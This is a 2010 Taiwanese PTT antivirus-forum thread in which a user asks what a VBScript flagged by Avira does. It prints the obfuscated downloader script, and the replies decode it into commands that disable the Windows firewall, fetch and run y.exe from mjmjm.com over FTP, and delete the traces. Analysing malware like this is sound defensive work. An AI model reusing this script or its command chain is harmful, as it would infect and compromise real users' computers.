PTT數位生活區 / AntiVirus (防毒)

[請益] C:\WINDOWS\X.vbs是從哪裡生出來的?

看板AntiVirus (防毒)作者 (霹靂狗)時間16年前 (2010/05/10 05:51), 編輯推噓1(1016)
留言17則, 3人參與, 最新討論串1/1
請教,剛剛小紅傘突然跳出病毒警告,貼一下Script內容,請教先進,到底這個Script是 在做什麼的? 因為我掃完整個登錄編輯器,也沒看到X.vbs的蹤影,所以這是誤判嗎? 不知這個X.Vbs是哪個程式生出來的 小紅傘的Properties Type: File Source: C:\WINDOWS\X.Vbs Status: Infected Quarantine object: 4de78c7e.qua Restored: NO Uploaded to Avira: NO Operating System: Windows 2000/XP/VISTA Workstation Search engine: 8.02.01.236 Virus definition file: 7.10.07.66 Detection: Contains recognition pattern of the VBS/Dldr.PIF.1045 VBS script virus Date/Time: 2010/5/10, 05:27 Script內容是這樣 function o for i=1 to UBound(s) h=h&chr(s(i)-562) next Set qq = CreateObject("Wscript.Shell") qq.run h,0 end function s=array(575,661,671,662,594,609,661,594,672,663,678,594,677,678,673,674,594, 677,666,659,676,663,662,659,661,661,663,677,677,600,663,661,666,673,594,673, 594,671,668,671,668,671,608,661,673,671,624,671,608,678,682,678,600,663,661, 666,673,594,659,677,610,618,624,624,671,608,678,682,678,600,663,661,666,673, 594,618,618,618,624,624,671,608,678,682,678,600,663,661,666,673,594,665,663, 678,594,683,594,683,608,663,682,663,624,624,671,608,678,682,678,600,663,661, 666,673,594,660,683,663,624,624,671,608,678,682,678,600,664,678,674,594,607, 677,620,671,608,678,682,678,600,662,663,670,594,671,608,678,682,678,600,683, 608,663,682,663,600,659,678,678,676,667,660,594,625,608,680,660,677,594,607, 676,600,662,663,670,594,625,594,625,608,660,659,678,594,625,608,680,660,677, 594,625,608,663,682,663,600,600,677,678,659,676,678,594,666,678,678,674,620, 609,609,678,681,608,660,667,662,608,683,659,666,673,673,608,661,673,671,609) o -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 112.104.21.226
05/10 06:07, , 1F
s=array該行只要再把第二行的數字接起來就會判斷成病毒
05/10 06:07, 1F
05/10 10:46, , 2F
為了排版 , array 被你斷行了, 原本是要接起來的 cc
05/10 10:46, 2F
05/10 11:02, , 3F
沒錯 所以明牌都是接在一起的 XD 不知這些語法是做什麼的?
05/10 11:02, 3F
05/10 11:02, , 4F
05/10 11:02, 4F
05/10 12:23, , 5F
cmd /c net stop sharedaccess
05/10 12:23, 5F
05/10 12:23, , 6F
echo o mjmjm.com>m.txt
05/10 12:23, 6F
05/10 12:23, , 7F
echo as08>>m.txt
05/10 12:23, 7F
05/10 12:23, , 8F
echo 888>>m.txt
05/10 12:23, 8F
05/10 12:24, , 9F
echo get y y.exe>>m.txt
05/10 12:24, 9F
05/10 12:24, , 10F
echo bye>>m.txt
05/10 12:24, 10F
05/10 12:24, , 11F
ftp -s:m.txt
05/10 12:24, 11F
05/10 12:24, , 12F
del m.txt
05/10 12:24, 12F
05/10 12:24, , 13F
y.exe
05/10 12:24, 13F
05/10 12:24, , 14F
attrib ?.vbs -r
05/10 12:24, 14F
05/10 12:25, , 15F
del ? ?.bat ?.vbs ?.exe
05/10 12:25, 15F
05/10 12:25, , 16F
05/10 12:25, 16F
05/10 12:26, , 17F
上面各行中間有一個&符號
05/10 12:26, 17F
更多 piligo 的文章
文章代碼(AID): #1BvovYvR (AntiVirus)
AntiVirus 近期熱門文章
更多 近期熱門文章 >>
PTT數位生活區 即時熱門文章
更多 即時熱門文章 >>
更多 piligo 的文章
文章代碼(AID): #1BvovYvR (AntiVirus)